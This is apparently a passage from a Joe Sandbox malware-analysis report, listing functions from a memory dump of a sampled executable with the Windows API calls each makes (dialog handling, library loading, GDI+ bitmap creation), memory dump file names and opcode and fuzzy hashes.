                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AttributesFile$_wcslen
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2673547680-0
                                                                                                                                          • Opcode ID: 3d2aca8ad3232ff8810368b870f956fa0574f1dbf84ae118e3339a7522c278e4
                                                                                                                                          • Instruction ID: 826ec43f70b67ea5a15b9fd0206578c334e70324040b8d068f6dd0a47120a5dc
                                                                                                                                          • Opcode Fuzzy Hash: 3d2aca8ad3232ff8810368b870f956fa0574f1dbf84ae118e3339a7522c278e4
                                                                                                                                          • Instruction Fuzzy Hash: 80E092315001689BCF50AB68CC05BD97798AB0D3E1F044261FE54F31D5D770EE84CAE0
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • _swprintf.LIBCMT ref: 000FDEEC
                                                                                                                                            • Part of subcall function 000E4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000E40A5
                                                                                                                                          • SetDlgItemTextW.USER32(00000065,?), ref: 000FDF03
                                                                                                                                            • Part of subcall function 000FB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 000FB579
                                                                                                                                            • Part of subcall function 000FB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 000FB58A
                                                                                                                                            • Part of subcall function 000FB568: IsDialogMessageW.USER32(000204A2,?), ref: 000FB59E
                                                                                                                                            • Part of subcall function 000FB568: TranslateMessage.USER32(?), ref: 000FB5AC
                                                                                                                                            • Part of subcall function 000FB568: DispatchMessageW.USER32(?), ref: 000FB5B6
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2718869927-0
                                                                                                                                          • Opcode ID: 66970c662ec642b9557bb7e66c599a5d6928eea9f6f1c7b0435e9c6e4aca4db1
                                                                                                                                          • Instruction ID: d0fd285675318cce98ad1a9786c96f207c1c00c43a24bc5ffac457b40361105d
                                                                                                                                          • Opcode Fuzzy Hash: 66970c662ec642b9557bb7e66c599a5d6928eea9f6f1c7b0435e9c6e4aca4db1
                                                                                                                                          • Instruction Fuzzy Hash: 3EE092B64003CC3ADF12BB61DC06FEE3B6C5B15785F440861B304EA4B3DA78EA619A71
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 000F0836
                                                                                                                                          • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,000EF2D8,Crypt32.dll,00000000,000EF35C,?,?,000EF33E,?,?,?), ref: 000F0858
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: DirectoryLibraryLoadSystem
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1175261203-0
                                                                                                                                          • Opcode ID: 155fad2be379f934ecdc91b368bb7e7de19000e27948c004c3a979195ec0feca
                                                                                                                                          • Instruction ID: e1aafc51b391995768e7339e83b426cf0c4be72123ec3bfdc09a12692ecfeb24
                                                                                                                                          • Opcode Fuzzy Hash: 155fad2be379f934ecdc91b368bb7e7de19000e27948c004c3a979195ec0feca
                                                                                                                                          • Instruction Fuzzy Hash: 15E092724001586ACB00A790DD04FEA7BACEF0C3D1F0400657645E2005DA74DA818AA0
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 000FA3DA
                                                                                                                                          • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 000FA3E1
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: BitmapCreateFromGdipStream
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1918208029-0
                                                                                                                                          • Opcode ID: 3f548082a509a23284247a2ce0b474e99e7d69e5a06032d790bb8811affe371e
                                                                                                                                          • Instruction ID: ed96d6b7cf9e204cad533e736ebec51b33887b44a175be5db1cd7c1246a2822f
                                                                                                                                          • Opcode Fuzzy Hash: 3f548082a509a23284247a2ce0b474e99e7d69e5a06032d790bb8811affe371e
                                                                                                                                          • Instruction Fuzzy Hash: A0E0EDB150021CEBCB50DF55C5416EEBBE8EF05760F10805AE94A93651E374AF44EB91
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00102BAA
                                                                                                                                          • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00102BB5
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1660781231-0
                                                                                                                                          • Opcode ID: 76d28c6624f1229f9d3ee1ac187175d3701d3af0dc2ea6ceebed8c438e1b0070
                                                                                                                                          • Instruction ID: 5ee2fffea2713a3fdc3f48ef318ee588101218d2613e5c3ac7e77ece70a29216
                                                                                                                                          • Opcode Fuzzy Hash: 76d28c6624f1229f9d3ee1ac187175d3701d3af0dc2ea6ceebed8c438e1b0070
                                                                                                                                          • Instruction Fuzzy Hash: F3D0A93525420018EC282AB42A0E5983389AE61BB2BE0428AF4B0868C1EFF18080A111
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ItemShowWindow
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3351165006-0
                                                                                                                                          • Opcode ID: e93752dcbdc51b710c71d187005894aa529a4f02cb1b7018210e8df5b03c2867
                                                                                                                                          • Instruction ID: d4ea7eb18e10375c5d23ebfeabd57c4a12ba48f7920299575fd63731c54b54da
                                                                                                                                          • Opcode Fuzzy Hash: e93752dcbdc51b710c71d187005894aa529a4f02cb1b7018210e8df5b03c2867
                                                                                                                                          • Instruction Fuzzy Hash: 5FC0123A05C240BFCB010BB4DC09C2BBBA8ABA6712F04C908B0B9C0070C238C150EB11
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: H_prolog
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3519838083-0
                                                                                                                                          • Opcode ID: 8a6b9dee5e4a365a862d2135ef28d567971308a5315fa5c9ed9d6f4a58ce20df
                                                                                                                                          • Instruction ID: 7b14bdd7ae7ebc9fd56b50d3ff8b29d656432ac0da9fc31a7542e7ed183172bb
                                                                                                                                          • Opcode Fuzzy Hash: 8a6b9dee5e4a365a862d2135ef28d567971308a5315fa5c9ed9d6f4a58ce20df
                                                                                                                                          • Instruction Fuzzy Hash: EDC1D530A042949FEF59DF29C884BED7BE5AF15310F1801B9EC56EB396DB309984CB61
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: _strlen
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 4218353326-0
                                                                                                                                          • Opcode ID: fb233ce7a5aff4237f521626d1ef48721b765c343b9cdda43a55cb90ced64ce7
                                                                                                                                          • Instruction ID: 296c70b6bf6735610b6cc7623028b6fc09e99916e90e5a138532aa7228e2de64
                                                                                                                                          • Opcode Fuzzy Hash: fb233ce7a5aff4237f521626d1ef48721b765c343b9cdda43a55cb90ced64ce7
                                                                                                                                          • Instruction Fuzzy Hash: 3451B6B7504345AFC761DA60DC45FDBB3EDEB89300F040939B999E7142EA72A548C762
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: H_prolog
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3519838083-0
                                                                                                                                          • Opcode ID: 99502df893077cae41a723ff69f9e29d0265495639be541afcf3fb18a8782d7d
                                                                                                                                          • Instruction ID: 150a89b76ad816c8f7b99446c84d1c620670f04ac0f03670b9220edbb0d17a3f
                                                                                                                                          • Opcode Fuzzy Hash: 99502df893077cae41a723ff69f9e29d0265495639be541afcf3fb18a8782d7d
                                                                                                                                          • Instruction Fuzzy Hash: 3571C471500BC49EDB35DB71C8559EBBBE9AF14300F44092EE2ABA7282DA326684DF11
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • __EH_prolog.LIBCMT ref: 000E8289
                                                                                                                                            • Part of subcall function 000E13DC: __EH_prolog.LIBCMT ref: 000E13E1
                                                                                                                                            • Part of subcall function 000EA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 000EA598
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: H_prolog$CloseFind
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2506663941-0
                                                                                                                                          • Opcode ID: 6e89f2bba003b07d0ce0ebfdace52128e99e870f189da0e8cc1f65584794e01e
                                                                                                                                          • Instruction ID: 92bbb2627b5a93c7d387ccde608e35923f241ea8ae8923ee7cd3b48d52be2254
                                                                                                                                          • Opcode Fuzzy Hash: 6e89f2bba003b07d0ce0ebfdace52128e99e870f189da0e8cc1f65584794e01e
                                                                                                                                          • Instruction Fuzzy Hash: 4541A3719446989EDB24DBB2CC55AEAB7A8AF00304F4444EAE18EB7093EB715FC5CB50
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • __EH_prolog.LIBCMT ref: 000E13E1
                                                                                                                                            • Part of subcall function 000E5E37: __EH_prolog.LIBCMT ref: 000E5E3C
                                                                                                                                            • Part of subcall function 000ECE40: __EH_prolog.LIBCMT ref: 000ECE45
                                                                                                                                            • Part of subcall function 000EB505: __EH_prolog.LIBCMT ref: 000EB50A
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: H_prolog
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3519838083-0
                                                                                                                                          • Opcode ID: 89fd160696c9c5c9ad42501f9fa30e717ab0349fad33341a8d47335f731ec1cb
                                                                                                                                          • Instruction ID: 415759ac29bd46258af2487d3792b70c190c4dd924725861b05ecfd9a323b1f7
                                                                                                                                          • Opcode Fuzzy Hash: 89fd160696c9c5c9ad42501f9fa30e717ab0349fad33341a8d47335f731ec1cb
                                                                                                                                          • Instruction Fuzzy Hash: C4413CB0905B819EE724DF7A8885AE7FBE5BF19300F50492EE5FE93282C7316654CB10
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • __EH_prolog.LIBCMT ref: 000E13E1
                                                                                                                                            • Part of subcall function 000E5E37: __EH_prolog.LIBCMT ref: 000E5E3C
                                                                                                                                            • Part of subcall function 000ECE40: __EH_prolog.LIBCMT ref: 000ECE45
                                                                                                                                            • Part of subcall function 000EB505: __EH_prolog.LIBCMT ref: 000EB50A
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: H_prolog
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3519838083-0
                                                                                                                                          • Opcode ID: 51c7d3c334b7fc1f4451e53b0f6dd1e60aebb5c6fc2d1af7e16047fe6f626847
                                                                                                                                          • Instruction ID: 22d3dbcd131a6307c25a4af12fc3c92941e8d90505abb1ec06adf792dfdfba2c
                                                                                                                                          • Opcode Fuzzy Hash: 51c7d3c334b7fc1f4451e53b0f6dd1e60aebb5c6fc2d1af7e16047fe6f626847
                                                                                                                                          • Instruction Fuzzy Hash: 1B413BB0905B809EE724DF7A8885AE7FBE5BF19300F50492ED5FE93282CB316654CB11
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: H_prolog
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3519838083-0
                                                                                                                                          • Opcode ID: 2d0d490b55204585f4e6403fa3277af9cbbe252a2095cf7aabfdd2fa27e0fdfd
                                                                                                                                          • Instruction ID: 1872d160b955d0d8381d88d59816284797964bcfead3b79a7102e4ccfe69cd35
                                                                                                                                          • Opcode Fuzzy Hash: 2d0d490b55204585f4e6403fa3277af9cbbe252a2095cf7aabfdd2fa27e0fdfd
                                                                                                                                          • Instruction Fuzzy Hash: 8921E6B5E40219ABDB149F74DC416BB76A8FF14714F14423AA706EBA82D3709A00C6E8
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • __EH_prolog.LIBCMT ref: 000FB098
                                                                                                                                            • Part of subcall function 000E13DC: __EH_prolog.LIBCMT ref: 000E13E1
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: H_prolog
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3519838083-0
                                                                                                                                          • Opcode ID: e8fdd5fdc6ea150beeafe5d2608ccd86c724c5079ecb232fb99591dba44f3434
                                                                                                                                          • Instruction ID: c4e71d2b834254c18a124947f7273146e4d033d5562b44a83ae12963f97eec01
                                                                                                                                          • Opcode Fuzzy Hash: e8fdd5fdc6ea150beeafe5d2608ccd86c724c5079ecb232fb99591dba44f3434
                                                                                                                                          • Instruction Fuzzy Hash: 0A319C75C00249DECF15DF65C851AFEBBB4AF09300F5044AEE409B7682DB35AE04DBA1
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 0010ACF8
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AddressProc
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 190572456-0
                                                                                                                                          • Opcode ID: e8b57439c9d0e9de48497f027504ffd74e901d90f6dec721b730ec0eee312815
                                                                                                                                          • Instruction ID: cd2924af3fcf0c1f4b2ad4860252c97963a270d53b5bc79e4c21b56af4cd5b36
                                                                                                                                          • Opcode Fuzzy Hash: e8b57439c9d0e9de48497f027504ffd74e901d90f6dec721b730ec0eee312815
                                                                                                                                          • Instruction Fuzzy Hash: 86110A33A003256FEB29DF98DD4099A7395AFC436075B8120FD95AB6D4D770EC4187D2
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
